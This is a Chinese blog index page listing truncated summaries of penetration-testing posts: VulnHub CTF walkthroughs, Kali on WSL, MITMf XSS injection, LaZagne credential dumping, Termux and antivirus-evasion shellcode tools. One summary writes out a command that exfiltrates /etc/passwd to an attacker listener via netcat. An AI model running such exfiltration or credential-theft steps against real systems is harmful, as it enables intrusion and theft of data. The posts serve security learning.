摘要: BTRSys 2.1https://www.vulnhub.com/entry/btrsys-v21,196/1.确定目标ip2.端口和服务探测根据vsftp版本没有找到相关漏洞利用代码然后我们转战web查看页... 阅读全文
posted @ 2019-08-11 14:43 micr067 阅读(142) 评论(0) 推荐(0) 编辑
摘要: droopyCTFhttps://www.vulnhub.com/?q=droopy&sort=date-des&type=vmCTF镜像合集:https://www.vulnhub.com/?page=18参... 阅读全文
posted @ 2019-08-11 14:41 micr067 阅读(73) 评论(0) 推荐(0) 编辑
摘要: 开启windows 功能选中 适用于linux 的windows 子系统打开Microsoft store,安装kali 系统系统安装完成之后,通过apt-get install kali-linux-full ... 阅读全文
posted @ 2019-08-11 14:33 micr067 阅读(108) 评论(0) 推荐(0) 编辑
摘要: 1. mitmf注入xss即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码如果中间人发生在运营商线路上,很难引起用户注意曾经号称最好用的中间人攻击工具安装依赖apt-get install p... 阅读全文
posted @ 2019-08-11 14:31 micr067 阅读(104) 评论(0) 推荐(0) 编辑
摘要: nc -lvvp 7080 开启侦听 cancel -u “$(cat /etc/passwd)” -h 192.168.0.101:3321 在靶机上执行命令 攻击机成功接收到靶机发送信息。 阅读全文
posted @ 2019-07-18 22:28 micr067 阅读(111) 评论(0) 推荐(0) 编辑
摘要: 简介: LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。 该项目已作为开发后模块添加到pupy中。Python代码将在不接触磁盘的情况下在内存中进行解释,并 阅读全文
posted @ 2019-06-13 21:32 micr067 阅读(131) 评论(0) 推荐(0) 编辑
摘要: 额,今天又这么过去了#……#前言Termux是运行在Android终端上的linux模拟器。不需要root,支持apt管理软件包,可安装python、ruby、go、mysql等各种坏境。可以用它来搭建渗透环... 阅读全文
posted @ 2019-05-18 15:40 micr067 阅读(955) 评论(0) 推荐(0) 编辑
摘要: 了解国外hacker必备(中文字幕)链接:https://pan.baidu.com/s/1u1uEeBAbZn6zc_tqUfcjBA提取码:jdwn复制这段内容后打开百度网盘手机App,操作更方便哦 ... 阅读全文
posted @ 2019-04-22 22:11 micr067 阅读(166) 评论(0) 推荐(0) 编辑
摘要: 简介: LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。 该项目已作为开发后模块添加到pupy中。Python代码将在不接触磁盘的情况下在内存中进行解释,并 阅读全文
posted @ 2019-04-12 18:13 micr067 阅读(499) 评论(0) 推荐(0) 编辑
摘要: 今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 阅读全文
posted @ 2019-03-24 22:17 micr067 阅读(514) 评论(0) 推荐(0) 编辑